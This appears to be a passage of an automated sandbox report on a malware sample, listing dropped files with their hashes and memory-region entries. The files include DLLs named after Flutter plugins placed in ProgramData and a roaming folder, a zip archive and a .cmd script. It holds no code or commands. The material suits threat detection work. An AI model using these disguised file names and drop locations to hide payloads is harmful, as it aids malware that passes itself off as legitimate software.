MD5 bfec2012b6589d4496ea0283e90a5269
SHA1 813e3fad5cfe4a30e20f05080d106811c5544fa3
SHA256 f9406ecaa9c86f2946f8b9d997f0210f1f5ee974be6548d1db039014d1b45552
SHA512 396f28eb15ed793db453cd3b3e9118f4386fe24a75e3f3914e881cca3ada8918b98751bdac51c4a5e897cca1e700b2a545686463a6b0dd6719ea172682cfb928

C:\ProgramData\texture_rgba_renderer_plugin.dll

MD5 128d06b8c5739f35a7c76a76bf1e6149
SHA1 901f9698bf4c4a10e8e902e6dbddf1782e1067d0
SHA256 bf585dbc4e4dce47f9efdeead15f67a69644ce6f1177ceec518882dc85ecc096
SHA512 ece9254486347751d6f68ae86afb36508fed81b00c4588f555db584a0e9de5f4710a24e6bb5b2b19a25bee20aa4bf90068f9eb2e37b48271614b6c97199e419c

C:\ProgramData\screen_retriever_plugin.dll

MD5 2d885495e81a8b8d1d5305fe20566484
SHA1 f1d2083d399dd48927cbd83e23f90ad3ce3e0632
SHA256 eb2e18881ddd80a3e54527264b3e7c5046f15854a196b76ccad28e8258f3f1b2
SHA512 e2bb9f8e377b381cc13538b39e8b3fb749341fcef84e7b26749bf35141c6c52a48636bb00c6fa7c585eec4c01b03cd0ec38c8f3e85e0ca2c2cda26d026def326

C:\ProgramData\flutter_gpu_texture_renderer_plugin.dll

MD5 e6c6c72226677bacf6ec83beda63f49d
SHA1 c0e75c5a5b9d7c8cd07e80a2ba4d809801eff649
SHA256 2018f17e324516fc891e5c868e2045970855a3a1521d73f0f6ae12ebf12cfbba
SHA512 3a52b60711efb4a34e5ff655e60d51a29c6d4b2cd4561a421a51647d5fcb2c75f1468a8f93c25206edebcf259112a4c7da41f90181ff7e53946e1fff5fb3f353

C:\ProgramData\file_selector_windows_plugin.dll

MD5 9641732f1db2eab135130c9128c1427a
SHA1 88b0857cfe055a1d920e55b3094116162e4eaa00
SHA256 b47cd11e4089fe0ae8baf4e05b4ccf19b1dfe403fd392649e9253c05d58f3cbc
SHA512 5c87b26e51771b61fdf87d577781b1fb163527d0f03e74327bc11ea1a24b1b449d4ab23f7393466ed4baf3809a5151eb30928f462b5fcd55bb8de4bd733856a8

C:\ProgramData\desktop_drop_plugin.dll

MD5 f4df6a33f0e0633dc756f78f8838a067
SHA1 ce1c4544e1ea3db01ce2738b2575b0c33c25377d
SHA256 c373994fbe373f500b129aff6700339c663ef14052eeaca53da8500877cbb937
SHA512 b3f7323e8eabea7ece7e52ba65bb6489029bcef6cb4935a01522fa973b3a0a108e1db2c8ea64abdd8a0529f5a9e15526b1677650c51757f775c38bfc1cd05e14

memory/1936-237-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beedbd78

MD5 174edf1933b82a399b614e092e04c3b2
SHA1 8ad2eed94f563c40fb051d96fbdda12f7148ed2a
SHA256 ceff3eb60d142bb1fdf699f62cb3d92af5cab0c4a7f90b74f9b711ecbe6bf698
SHA512 1d6d0f1790a0f3ed6fe3a3e4d44961b9a1efc9e0f5663c4e31f1cc2994060ce06134ab5ffcfb0e6052ec740b7420debecc0eb5ebc3964b3266463e4baaf88d20

memory/3000-243-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 f47baf517b53aff2b0edf7e7e9864e01
SHA1 7f3c1fded0e9b328108b1568be8601bfa794b2df
SHA256 c3a63cff50b2a98aa2533535d64de9e7d295e1eec808c70af38c3a393f9bc40b
SHA512 07cb18cc2532238364dc3987fabc97b520bb75cc0f7ede95f8836223f9f8a086d7e4b09d8a0a625c8e9828d183871322cc4afc16a98a8af2262c4234a5687a51

memory/4964-258-0x00000000063F0000-0x0000000006744000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef3cd3ba0aafeb152d085021accc6d6f
SHA1 272a9e587a51b637d6a037fc0422b28ebaec3fc0
SHA256 523e2fb13fbec89a96520226611473a75f6426464b0f75222426f67ef8fd9583
SHA512 c6d4de5906f777e63ebba097e750a9187560df1e98d9d8e7f5c05e0ba5aa2e3292bd952a6a2321b2718ba10e6164928f2590d83e45ca1248cd50dc26e8ac1055

memory/4964-260-0x000000006D020000-0x000000006D06C000-memory.dmp

memory/4964-270-0x0000000007CD0000-0x0000000007D73000-memory.dmp

memory/4964-271-0x0000000007F30000-0x0000000007F41000-memory.dmp

C:\ProgramData\ohok.zip

MD5 e02bfbbd372fdcb1983c1be661d68472
SHA1 2fa2e2937a92a9f97060efadc28c2524db671d16
SHA256 4566ae83ab0b869ba3d80e69966e7b296126ef28d9d5fe2e6c00b6a95ac3325d
SHA512 7e69a1c7fa2cb06adda7fb5d7a73cd589cdf94f465be7b1112571530e59b898646d48b9f6017b9d86dbd3e5a399a0eac021837147534fff249c0343831bc73cb

memory/1908-287-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

C:\Users\Admin\AppData\Roaming\LocalTls\desktop_drop_plugin.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1908-305-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

memory/3000-307-0x0000000075720000-0x0000000075B5C000-memory.dmp

memory/4880-308-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

memory/2956-310-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

memory/2956-311-0x0000000000F70000-0x0000000000FC0000-memory.dmp

memory/2956-323-0x0000000000F70000-0x0000000000FC0000-memory.dmp

memory/4864-324-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

memory/2956-327-0x0000000000F70000-0x0000000000FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Pushing.cmd

MD5 f32d10ac89424e8d8658ff3b481c07c8
SHA1 e9718a08c8660e86bed522c616b0868cc4c1f61c
SHA256 6affa8644e677b6e7d9923cb78189be774ee32e7d12cde4b402344dea79fd2e7
SHA512 01d281476c3ff1ddb3668c078f36e38b3dccdf4a1578fdc9678ca29a1970b4cba3dc74f061ea9605d393bf76a8af7b8bea16ca61b199eb72439d1196ee42dce2

memory/4864-778-0x0000000000EE0000-0x0000000000F30000-memory.dmp

memory/4728-784-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-785-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-786-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-787-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-788-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-789-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-790-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4864-791-0x0000000000EE0000-0x0000000000F30000-memory.dmp

memory/4864-794-0x0000000000EE0000-0x0000000000F30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\64684\x

MD5 1f9b5a942b513f1fbd30ceb1c706ad8b
SHA1 b41e420c4202e90493d7900f8e62b92dfac3a3c3
SHA256 ac78619a32f1d561436ea5cbe000374255a263c2ea9131887670b539d154fb4f
SHA512 1ee595b4a1a7b083f84b514acc55e66928240d230d31e0415986ca9452e2647dfff81b6d910e4402350bb56fd54005f8474fc20badd5e8e2ac4945e179a20abb